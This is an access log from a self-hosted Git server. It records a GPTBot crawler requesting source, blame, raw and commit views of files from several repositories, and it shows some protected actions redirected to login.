git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:16:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11311] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:16:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 6440] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 18644] [Gzip 11.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13515] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13550] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13550] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13550] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10455] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:26:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" -[17/Feb/2026:16:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/metadata.json" -[17/Feb/2026:16:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fPYZ-00.toc" [Client 74.7.227.38] [Length 33641] [Gzip 12.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" -[17/Feb/2026:16:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fPKG-00.toc" [Client 74.7.227.38] [Length 23794] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" -[17/Feb/2026:16:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 19940] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:16:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 19781] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" -[17/Feb/2026:16:26:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/Program.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/Program.cs" -[17/Feb/2026:16:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15250] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14028] [Gzip 7.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14058] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10812] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:16:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9980] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15429] [Gzip 8.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21640] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14060] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14060] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fEXE-00.toc" [Client 74.7.227.38] [Length 25137] [Gzip 6.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/EXE-00.toc" -[17/Feb/2026:16:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:16:26:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/fetcher.py.claude" 